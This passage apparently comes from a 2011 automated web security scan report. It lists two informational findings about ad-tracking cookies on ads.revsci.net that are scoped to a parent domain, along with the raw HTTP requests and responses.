Set-Cookie: rsiPus_gTSf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gTSf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fS3U="MLsfsN8vLi5noABTslDGHgHql1PWxLtwUwyTr7SqEAeIG7Al09+u78XGTslEJh9hd6s4uyf0KT+RdVkyIHCdaeQj3mcEU7l6Sj3Qj5G4WmW0rSpVxafl8+M3Fk56Oh4ptMDux7SrL5cCm77WnJyEjeFA0mmzapRCOBUulwgIjQm+g66XIT5QuklEZQ0ZUK40lpWz0shPr8fLCb6nws9ZybhLffqh5oA/PO147pi1rhzplrmCnxESmw4o+EBf8zgWak40Ty27uaje21eUT8BSI6pxESrpcBetjrx+EQP5BfDN25iRTl0UGV6Rd0PW+PODtnDjF0aDwrfsnCXsDZA1lz5pIm7H8vTOz6Tp6rXuoEwC4vnK2+3GKFkTy9efnh4s3LEwNZE5D/R1bCjuA8RBSWOKNjVEPgdeYW38wM897HChogDtvYqDXI+EuvaQzYnW2WrcIuVG"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE9HCAYYlW23lB0q4DdGKH3vrseeDWozeseSI8hmVs1y9IiVsnPR7mWvcRq2i/D84TaAa8k5LT4xN0mvOzPwpJrhR300EfJhCEjmBFpjdbk3jl46vifDsQxpSkbUgiDlRIPlPFDddUf4ZwKyGVG8yyZzpc1KlNh+6xHUCydNCWk1pYw2zpCJcy0Xq1ewfSwZgkU8YbWuykXS7fiHQ+7BpC3A9cDo+dBWRC+oLlUiAuI2+OJsqbD3rTZhUcZqf/PHxR44d2yyf16w6rv74vpXGzc03lEFRcLgBiTlqVuFKRCoKYg3hqhE20rtC72XJwbqRf4nqNohc1/W2Rj1Q57pDoa7C/rhV3y1OIkDuM/wU/a2TfzoYbdbeGUGDovksoYO+38RpX4ztBEhTSSdexPYmwohTdS0NaK+7rBfx4LZDgPmZO9m5dZmY/KeiuNJOwZore0i5QDJ+nNyDPl+aqwV68N3+nUC1dgz62t3SR3cAdxXwV0b1N+lT93bHTAYHpmvjFW6LTYO62mmNdMMxE6ZVAMf9Mg3lgWgTpD0AoKv+omt9CweOZkYB167yE24hZJG9BwC0iGnWX+7mmx4f0ilrhSDM8I4HQiJ/LmTmrXGtB2rrsgZ5UyI8PrccHxeXyOrPstSXYvQmVrNJ+nbFs1NhLBfym2WY8l9reQ9vOFVNfN4m3cAlSz0tCntjgnWzbD9T60SDFDdemcbIk/SuIRFhKWOBpg5ALDdhlf0H5WuMPn5Z/o1q3UWmwYf9Xi4EIRBzO0nTds99qepYGtaJZ24V64jJuwYQbKl9ij50Pae3gOxuJ5o/Oh9Kw82gxy35sfQjIwNz7GdtRTXLBMHd+LUbvw6qVpvW5x6vmEtkevPAiSqzuJINH3EtS8s/MDgSBgnRIlq54Jbq0R1xO88si8XtUs/ZcRVgqVtGa9OYQErt0/WvyJiYgBREJX1qLhk72olVr8CMxCo7D3Iqdixu6h1I8iJoaoRrurPDye5dIkrV4oDn582sQqPOfIE9j7DzwcUnBbF5Mwp3rn8l1xx1NDoz9elQZPKNgVDhyjdQtxa1defEdJN3w=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:40:49 GMT

12.19. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_vHAg="MLtXrtMvsT9nIAG3VrwFhfjWOcNPjZk2OWir6JCihWxgb9Moc8z8fTq2sJlL/BuYW4dHbu41+HA0cx/jxufMhpPJwuid2e33gSvDA8DuTrJqEkx+6zx+C5wrm15kHKWeC3hvfiGDXE7WOEOayfaDrq0es/h3KKmPVAKrqUDwLP8TFWccB5Vqn1OtBLTOp3vQ2aV2kToAJBEPmTXo4g/gZeiO/iALj+tlFL/yaEo6Fc+NhzVjz577Z9AR/J2JwZe+FB4XdCMXi8XkJdvnLzP+aRWrfgYM7MpbCyZV1MOtgXYdwwy2egw4fNgN4iLyz2kDV9VRwSd6q9dVHChYo01BH0CYjrabX/PwIl41yA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJUmnfxIY1E2uu4kIoUKZSPJB8PrRdps8TGitorbJI7W2TIocxd22NtOpoxNEX7VcKjs47Gfe06wekyPYpBMP3KIiBU+UEHNKHhpWzizP4IMWx1/r492iGbZN9WLD0DOxW+PPqT0DPePjfzyNbswJnkDffJIkapARCeaosvrQeWmq7zUkRwAcfHvN38xU2kiJ4c2C5I3tHXxw4/tbAVI3M2twpRvuKxzmZYKoIrlwTaPFg06ijhKmoekUWQoqtBRcZZ9TlKeelxoGPGNhc6eWMe3cm/ySHVtpaGMa4BMarnFhVq5CgQm39zmFoBW5ZgfnX6d/CX7kt7hepovSV3Nar2+Og4UP1+Rm9e4CCmDbxe38mns9fRRAzDyWIx28qgZrZfJ61vLhzOpv10wkGNvJcHZVMIObXMsV0Asu83RG74oCqtoHDjDM8QgiiSe8FUYINvP2cIp/C/kRdSECmnvtAyqh1KCgRJzLhTZuR3CK9+IU9rKbxPiHNpuKPe5SXre19g43/0jMb/qAjjjAYCKAsBLNH+T4tkhNwmjP5wy+8iSVoxfZaJzsSFsUogXfOA16A+F1v0f7YQPYLaiToYd+pDKU1WxoL0uRYagECWcQb6Z3nAoFvNweiHlX2SKhexNM4nHrYy8BbmYNg8SmCU0pOV1B5ZW4FxlJthWfQWZrYgE3YnvmYOUVrHkXdbCpoU8UWTEmTI53YnOuOAlS/G5csBvUjueJeU/93qe2eISmVgJEzvCPwpqtm6PwrLjN8ekcOE6iso2ZUegI7jS4GmET6Toqj4uL0oiibRnSCQ+J0QUDXklh6EIVGkXlZOIZP5+jk2gZ0EF/T6DVBTa0+PrMtJAX2Pj7sqJYXcDaRUDi45V4a6QCi1WJ1kgFEXkVzL5biRujTNq0cVPHDkMtrwb9"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=MLvv7qPvYS5npS5IdtJQSJvhPx/j4C3JXuteOzZrowSCWmqpgTbMk8TbSMyqxlmLyxECNpR02+gPiezqOi+5yDykHuJcd6JJdoqLT8+i34bQnPvlwJigh1mUBVMxT2jfIxNwiDsUjsIFhNY13veukem47waFuIaQqYRyamjEvbzrtYAFMkMLhz8IyAfDJDgGAxRmbCiIOI/di7VuccpOkCFmEfIjhk5PRY/BVcGMxjjd26Gh4r3LbiC/DDBiBEkhq8JEqKIFkLwkhRrrOal9LlyDJN56E1oZkKstcU4ls+6wuVbuB+4+40PT0qOQ8ovh6fTDhw1dZ5SWaGL6x6vGDshNHJvL1UajC5eKoBIJ2xSFpyDcj4+w77js62NAT7kEPYmvqQoshwPyf2vOCimLsUgUFNNxIGmZPYzZs4PiPM+vVu1dcss0McJQrn3DO1uknbOYHQiwl9wlvyRQm0rbkjW9LIrwSiZCNdEo0ad0FuCYBgpXiDG66lxpMUq0lKVhL3YyhyI/Oj+MuDOYFK+dW/6zM7b1mda0br2f4dGKPL3vg4qXPKYWMdCSKP0Xg355P74y; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPF50OBLwIMpzaxu2HQrcQb/coAaHhJAbenh/Nv2MY6n2e1NDCNnYNPat72X0BRE/esU9+EywiROtUTQMbYBq9rnjjNjeUEe32iu1AIHKjKt7Fndxcuv+HBYCNWc2u0r9BSCGY0lWYHj0kddsl153LxKPjEBRX4N7YV+UiL596yc+/XaoxpnMq8ClHjz4GUV1zPVpVxAexnxc2VYk2J5ZWkA6vemmq+Y9/WiNZNbE26sdYD7pwlP0xb58DJLaJ0BMJfjTLY4z5F45OKPR1pmg==; rtc_rnU6=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Ejr/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFukH2RhvePE26HoeBFV5kQJR5W9feBwQwoflnJmU9r6cb2JZX//hGGENc5px9phZOkJGucNggdRkYXvY5K0=; NETSEGS_K08784=d303c7ec11fd6a67&K08784&0&4df176b8&0&&4dcb4af6&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsiPus_2ZJb="MLtHpENqcx5zJhHBQhzgK3He1h3aw0A6X7azDvfHiMlclO1tdu0KektdKeHwXOMUVaY0m0LaKBIUQalgzzr5lW6q66bvi1YGG7mt0omOkv2p3Q6RiqmtjSbwxbOimlKBmUyhIXN9/LP5pQA1ehm/668seCfMvdSvlIxG3tTaJfxJReTn635WKmfzlxcpiRFzYIxojmq5n0Tys9BIlVqMmXcMtRpx"; rsi_us_1000000="pUP1JklHPwIc1Q0VwanxzTdZ2/4zipi5ZKPbd2VLfdV+lkvoeIlE1zSxcznS+KoMhK9YJjmf9c9L18zMUhyaykGFMZvgZU3jUz/3lEOhU8+qOw2xwHoAsehEGwZghimo44CM1p4MyHfzZA4pubseNPAZ4Kq5ZLrL+f2zP54lvTyPjNv5lTWNX3eNlDoYI5sG9IOCN+h++nZnkwV+owEaMWKHRCvMOHtvmIcm+ypY5ReMHXYXlUoOjAl+EMQObFf5oKn272NxtqmL/6LHIlDedDScq+nhOP6NpxNEVO59dmN1MfnbehHp68hDiBM+TmRxuiwlXYMug+KIR0pGFks1aWnkiZuLZPAr9x/5PmrH7yO/xeYpMGHl5ZXnxsnNbTf+L+KFFTnzBb+DMQmY7Xt2MO7m1LJWRIZxrh8jv+ccXEXSLjnwzKY9qynUrWmwVJ+nOQyqEa4OleB/vNRTSKkgls0Lpe2h9As/5kth06ZOY3RR3bruhoruZpRPZnMFnBVLGw/vPThxMoZijl7d9ttwNd2WU7aTfvZuDDtGZBcEVyhi7NEajfyFTDB35Uwu0QI3Ug99pST7MfmQXZVSUeJ7XS1tJSPSDsp8i7ljY13vOyJ7+GDNyblrjs/vDLxJWssKpKc="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2ZJb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2ZJb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_vHAg="MLtXrtMvsT9nIAG3VrwFhfjWOcNPjZk2OWir6JCihWxgb9Moc8z8fTq2sJlL/BuYW4dHbu41+HA0cx/jxufMhpPJwuid2e33gSvDA8DuTrJqEkx+6zx+C5wrm15kHKWeC3hvfiGDXE7WOEOayfaDrq0es/h3KKmPVAKrqUDwLP8TFWccB5Vqn1OtBLTOp3vQ2aV2kToAJBEPmTXo4g/gZeiO/iALj+tlFL/yaEo6Fc+NhzVjz577Z9AR/J2JwZe+FB4XdCMXi8XkJdvnLzP+aRWrfgYM7MpbCyZV1MOtgXYdwwy2egw4fNgN4iLyz2kDV9VRwSd6q9dVHChYo01BH0CYjrabX/PwIl41yA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJUmnfxIY1E2uu4kIoUKZSPJB8PrRdps8TGitorbJI7W2TIocxd22NtOpoxNEX7VcKjs47Gfe06wekyPYpBMP3KIiBU+UEHNKHhpWzizP4IMWx1/r492iGbZN9WLD0DOxW+PPqT0DPePjfzyNbswJnkDffJIkapARCeaosvrQeWmq7zUkRwAcfHvN38xU2kiJ4c2C5I3tHXxw4/tbAVI3M2twpRvuKxzmZYKoIrlwTaPFg06ijhKmoekUWQoqtBRcZZ9TlKeelxoGPGNhc6eWMe3cm/ySHVtpaGMa4BMarnFhVq5CgQm39zmFoBW5ZgfnX6d/CX7kt7hepovSV3Nar2+Og4UP1+Rm9e4CCmDbxe38mns9fRRAzDyWIx28qgZrZfJ61vLhzOpv10wkGNvJcHZVMIObXMsV0Asu83RG74oCqtoHDjDM8QgiiSe8FUYINvP2cIp/C/kRdSECmnvtAyqh1KCgRJzLhTZuR3CK9+IU9rKbxPiHNpuKPe5SXre19g43/0jMb/qAjjjAYCKAsBLNH+T4tkhNwmjP5wy+8iSVoxfZaJzsSFsUogXfOA16A+F1v0f7YQPYLaiToYd+pDKU1WxoL0uRYagECWcQb6Z3nAoFvNweiHlX2SKhexNM4nHrYy8BbmYNg8SmCU0pOV1B5ZW4FxlJthWfQWZrYgE3YnvmYOUVrHkXdbCpoU8UWTEmTI53YnOuOAlS/G5csBvUjueJeU/93qe2eISmVgJEzvCPwpqtm6PwrLjN8ekcOE6iso2ZUegI7jS4GmET6Toqj4uL0oiibRnSCQ+J0QUDXklh6EIVGkXlZOIZP5+jk2gZ0EF/T6DVBTa0+PrMtJAX2Pj7sqJYXcDaRUDi45V4a6QCi1WJ1kgFEXkVzL5biRujTNq0cVPHDkMtrwb9"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:41:40 GMT

12.20. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_8Tdl="MLsfsN8vLi5noAD7UlKmCeGhAP46rO3VGVkG3cTC//hXKAVhzgsM6n2u8NRAWCkwlkp7R909rxgJCSUtdP90+WpBKh3IxnnSa60vjSMgeM3M44P2Q1ZKaAXQA4Udgxl7mFn8VFA6ipHDpoTUG7C9O4Pgwrt6fMYG/9KOBspe5ouFNDa0I7gFKjQsrEteLApaz6BmjLdCFyzK2wedlrfj6DaeG4uph8ScspDLsRtN7zgovFWn//4xxFM0gmMmOEDx6mFpU1ph1l7pmfjORzRcqnchOSoFOGsUDQhhACxTEZ4J13w5/3NSjHEjPNR07flIaq05tjTIfQZutqXMdI6DW89PNtY8I2NGUxNCbLkconRe3ooHr9Swk6WnhMhNRTkI5FBYw1wZ9yH3LpE69Xhru4gA29szeKRgLSKhYqAoD4rBu6sD2BKS56+x62mm6B5tLFus+g=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJE1HMBYc1A1qdrcIJDxQsPOLjDoxzTAyNtIHury3GtT68G8x1wl2w/FHOQ/3m1TMxQXtpPTY8fzxzQOBeO684d/jQXWEgaK2R2azl85fUjtK5ppvPF7qk2Vr6bPPmSLwphIhajDBl0rnMASBSRnSA8xpTxeM8XzyCQN5TIxZ/s/aZ5XnGxJxUXcZRLdXBHwHByl6GjhIRC5n29D7kavYdN3qHN067tuh4CDbjWHZdTUvEuVr23mdHzW8yzODK3m6vgHsu1kgSSqpQz70pwaPumeLTWUxOPeBw9zt8qvD+QM5nom0E7zgIyrBi+4MPVWykC5jJT0hirtdxJf16/D1kQSjC7lXzFwzmTGzbqBFVDZzp7Js6mgo5TvULYFQpGvTyC8PK6mLXr2nCU/nXAmAOt3bjs1cUDhPSfryi1ki9m18xO50tPZic3KFyD7mUMUTo11xkNFkmtQ0ak0Ddw2OOm4XjS9UNoeKONnaTN7hpy1ub3Qsq2v4VKdakoR3Z+6860bM9tT5ZGCTMBBbojyO8DznzR+wyGUYzy5iwxT8wQ6L8ziZzQYge0ny0CEHBzXMOOUJ6F+sJcHphZUAKXYhqr4nioB2oe7kwRXoBeRITYepdRPWM+wuiHH5pL7B+BzYk6YgIfDqNVzD8AVH1fs+3PkRwHVqPInmyKtgJtcBsSEE6isuPUnMIk9uewP9gyI25nrfM+xgiSJaURZYOeh64cPGKyPynabpuplK9dVjEmyyHwdTodTFbyIAAmooYKgKS2eXuWhJuYbv5AuB8Ari+Tj5AbYFJszJ7DDQtfaOdhpShAHERDrQaK4MppXYRzA6yrVm3vG/FhKVgwg2tpjGgO/+r32Y9Zm6Xk5N16frL9RXFo7PRggasG1LLW/N8pIXUZklt2gXs4tWonag4SY7fzSCSLQnfFYbZS0C9g4ZQQJxpOTTkqEweKtTBlPIpNfRRbwI5vs3nWuPg8gCnCY5PUzOIT8S1kAlHovix7kguSt5/64A0p0bJlGt+Gc+2cNCNKeRZnnrXGoEIIfMDxUZJ5ctMfFVk8nGKBUGP7gt8ZfAGFI="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9342936133034.527?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39S8JaSpnph4dB7K/U2jMrlZxPiFsbBfSBcrlROJywhuHqR1r/UA1T0iRssIdAE9WG5SkuBEsQUD3IuuN09ImomKQMeFq1jtxllLl2hNvJ93zI8nQT72tjMgtUdO//9wYgRqB8ZXuPro+o7BxsBR5pxD7EXVtXGydBkVQEudXG2D2wIkNBeqHmIWJj+bGrdjGRyWixast+xLN0K4Iw+ew6ThmTEKns4HxFbcBnFLmChGZ934MWdGZXXYRWuhxS3cwBXNGIONtB2mXemfgyEqzd2IBmI9G7wogGLDx8Lw0DAp53p7JuTlqcYDDCICXYM9H2ZnYlIi4JrCJzCy8WcgNq18GmmzuaTOz/CYt2C7l9cgcwecxI15dlo8KJWy8mdmvMATQlBQZvvshGx7/ZWO+n5+L+o3XoVAx3gT2aCZHqJjly/K2Xoj1Qw67qH0PuJYpMK5P/KiQ3zOVyfP/ypI3utDRIhc08fTvQR/OwZZuegUWhFE/sq9FQhAzxOxIUTEvSResbfdfBhvTYofAJyTSyywbmhBb1MDtD0AFkYRyczjrYj2sKaFHZRb4fmzvPKfH6Zk5gmTLJV0gMS1UqtVy/S2L8TpN/clrGMHfxjNSPD5FT/EJtkm0EFhEQ27Z/cReQRxmltlL0MzcDhcs4e/wDwceblUp0um7chLLj/9/l1yBXBuwEgHk1flpVPkRmS/XI+a+2dCRvFnQSugMULpDNrA24o1pFVOIWNzLGZT2Krf+nzgF5TV38bNdoImSe5zwcruCXUG2Ktx5bQZtk7hjyijC/wmaioSX0PWNvks1FPlRUSXt/go8LnugdkWwYNOashsf6bBdytaAhOmPeOITWXSATA4ZE5SyPxGC0Znb3KDFATW1t50eAoudsHBsRbGRnxbn5H9cjPONtxL7egOM2+ltX2Nj9k3QVOzWzXEbkqT5akyVl21my7/DhratEWYI71JWlJ+9P5DWoLAVAyHTfXhezKMST83PEAtbhYhRavvp7A==; rsi_segs_1000000=pUPNcDPB7QMUFVJmHElW1WAhFpB0I5EmV+QHrdRrcAMkOX+o7LQjAQv0aGumjYcA+pD55MfuOfQbGooH3qorp++zHuX/61m4ao1z4yL4Lb3cyf2EkQb/3ZOSwdnh6MSu2Um4QVZJKClGNz2Fl9QeLKxco3pM/j3xxqXi/RBfDYQLHw069nJi4GhHujSDyULrAXw98qMzqzoEqWE=; rtc_6axN=MLsvrdMvcT5jJQFErn5VSDYGHlHr5G4IUDwGBCOQN50vl8AxTgkQ69k2sWbYhD5swupGFuttZZ30pjREZ/ZkKkhmVOC4XP9dHEpHAm3ADaku92HBduCPjDheEZyi3USKjMyJU8PKvSGf6dbgKbkkF1T9nPoTyICKBODL5dWNTWGJSo//SZoNqh0jXWrCVj5fE0hG1/Ew1855Q3kGOJISwLZwyFyrdDpPp9pEr5K7YRGtS1DhqDKb+B3xI4h5pUmK196H1VYARyez77DbY8fCN3YqmgkgAm74R4TtPLq8byYJ7dh3Jpzg7zgqcfYD+8HJFFf4m0VurVwRBH7s; rsiPus_TuCq="MLsXsF/uIS5npgAHiuo+xaAquFHWxLtwUwyTL1XC//hXGJaixt9neOzmYVtifz75nnrUC8ggvkGWKGkwE/VBlME+Q/z1CJ1IxSZ/i6GAWifDGU/pc7sD4QgyAm917NYUdYZyh7iBzZslsIabjNz4MeyillaRjQ2YsKPNRrjQY7vW1DkdAuWciLCBhlz/wrCGW8vuVAft0pSKk9JA2l6FMhjfXYeZuIYTQXTpgQkcMpDks5HxwOfsvpsaEL2NaEL8Yclw+0VwG7q3HFFj76/OIf0IMyUZCEcOHojowzGhV8ioE5aV2ws2hZ0IhhV8uOQHffx8KV33w+vWfAfqWVYrunKd0UvFGhzqCyNSeiFSR238HKp/W2VSXnq3hodOv2LuKf+45Dap1xZrLzh5Gi5QTzedauVd/OhMDVTGxhMIICko4xgErqrMKnEgSt2qIeDrG7gw738="; rsi_us_1000000="pUMdJE1HMBYc1A1qdrcIpHt+BzRbvej2Bq1enLhfd/9JtbqrLXHQUFKY4tbWJCWllbpxhHWmZVx0ucvusEENccom1eoSelZo2bjP585/yJvVoeKdew/pWdO1jdimeNiDCHHARbNxjhgDSAoo4/VkIPbCfXmpHmKQ2aGDkRHUDSdNibk2pZTw0JCPMq3Xq1XwckwZclW/iCGeG+MScJFQLlNkJ5pVl4MLIeYC+D1SlCdtQTJiaIg7Nc9aljZsb1Ca/SZ3tYZ145L/rrf3aZbm94I8cQZYm8kK6A1uO0HVgrysoHwqzT8BslU/eEbui5J9ngByXK4NQjre/Y86s/IK64wvOZ+bh3nxv7ir7UIepY5bUmm8BGNhCfqWNXaPrkmy413T+yEP/fGrfl2WiJgj0TwaGEQ+aEyfszo2qF3z1Dc6Yt0TRP60K3wYZkbedycVWxFTylle0aaw/YlXX5xx1RItTbrQjGgWaaCGAOl8hcvHc0GreUdN/N96yJbQsBJw6shZ0xu6bNYNx26IrtaCaLz7DBu9tJohDo/d3GAg2FagmPjNGU4ScgcBHqrLCHsRHCR2S8Waj1EHDZEZdzxoV+v/khvWy8PmVPv7VibvM5ZJuPuhZHDx/MJxynPLaSms8WfLFSMRlZqiaMlJFmt4Bg9w1x84e+Ap6V+WvX/jnbPgVQx8/msu1bnCAs7D1pjP5ec9fUCgKe7zoYZTtPett2030waCrufOvU/q8Kulj5qiEBP8l63DiFJJtLuHlcsOQ2Fk8zI8mrwqYhhLzc3YUKcqdD57OXX3bHf3van1fxADmyIN2zpBnbFymRX8M0fKWqei00u3BYu2AUPoT5nB019kNGZqFd1GOAElMGa1tE3ZUlSk136ZpEEzTMJKP8hr084Tygxm/mq1e1EGTOEVgOlRNSetBtvL/tFWmx5CRf+xsLuQgiB9P7F4gyIC7aoKM32/H4iaaJPtORccErbqprWuOPEWC1TP35spsis5lGm5x+Z7r7QPpX8exQbi/B/XCI3dFJYv88HFbiXpOKSXzk5oggHRyX9dOkLuQwCIHM5E"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TuCq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TuCq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8Tdl="MLsfsN8vLi5noAD7UlKmCeGhAP46rO3VGVkG3cTC//hXKAVhzgsM6n2u8NRAWCkwlkp7R909rxgJCSUtdP90+WpBKh3IxnnSa60vjSMgeM3M44P2Q1ZKaAXQA4Udgxl7mFn8VFA6ipHDpoTUG7C9O4Pgwrt6fMYG/9KOBspe5ouFNDa0I7gFKjQsrEteLApaz6BmjLdCFyzK2wedlrfj6DaeG4uph8ScspDLsRtN7zgovFWn//4xxFM0gmMmOEDx6mFpU1ph1l7pmfjORzRcqnchOSoFOGsUDQhhACxTEZ4J13w5/3NSjHEjPNR07flIaq05tjTIfQZutqXMdI6DW89PNtY8I2NGUxNCbLkconRe3ooHr9Swk6WnhMhNRTkI5FBYw1wZ9yH3LpE69Xhru4gA29szeKRgLSKhYqAoD4rBu6sD2BKS56+x62mm6B5tLFus+g=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE1HMBYc1A1qdrcIJDxQsPOLjDoxzTAyNtIHury3GtT68G8x1wl2w/FHOQ/3m1TMxQXtpPTY8fzxzQOBeO684d/jQXWEgaK2R2azl85fUjtK5ppvPF7qk2Vr6bPPmSLwphIhajDBl0rnMASBSRnSA8xpTxeM8XzyCQN5TIxZ/s/aZ5XnGxJxUXcZRLdXBHwHByl6GjhIRC5n29D7kavYdN3qHN067tuh4CDbjWHZdTUvEuVr23mdHzW8yzODK3m6vgHsu1kgSSqpQz70pwaPumeLTWUxOPeBw9zt8qvD+QM5nom0E7zgIyrBi+4MPVWykC5jJT0hirtdxJf16/D1kQSjC7lXzFwzmTGzbqBFVDZzp7Js6mgo5TvULYFQpGvTyC8PK6mLXr2nCU/nXAmAOt3bjs1cUDhPSfryi1ki9m18xO50tPZic3KFyD7mUMUTo11xkNFkmtQ0ak0Ddw2OOm4XjS9UNoeKONnaTN7hpy1ub3Qsq2v4VKdakoR3Z+6860bM9tT5ZGCTMBBbojyO8DznzR+wyGUYzy5iwxT8wQ6L8ziZzQYge0ny0CEHBzXMOOUJ6F+sJcHphZUAKXYhqr4nioB2oe7kwRXoBeRITYepdRPWM+wuiHH5pL7B+BzYk6YgIfDqNVzD8AVH1fs+3PkRwHVqPInmyKtgJtcBsSEE6isuPUnMIk9uewP9gyI25nrfM+xgiSJaURZYOeh64cPGKyPynabpuplK9dVjEmyyHwdTodTFbyIAAmooYKgKS2eXuWhJuYbv5AuB8Ari+Tj5AbYFJszJ7DDQtfaOdhpShAHERDrQaK4MppXYRzA6yrVm3vG/FhKVgwg2tpjGgO/+r32Y9Zm6Xk5N16frL9RXFo7PRggasG1LLW/N8pIXUZklt2gXs4tWonag4SY7fzSCSLQnfFYbZS0C9g4ZQQJxpOTTkqEweKtTBlPIpNfRRbwI5vs3nWuPg8gCnCY5PUzOIT8S1kAlHovix7kguSt5/64A0p0bJlGt+Gc+2cNCNKeRZnnrXGoEIIfMDxUZJ5ctMfFVk8nGKBUGP7gt8ZfAGFI="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
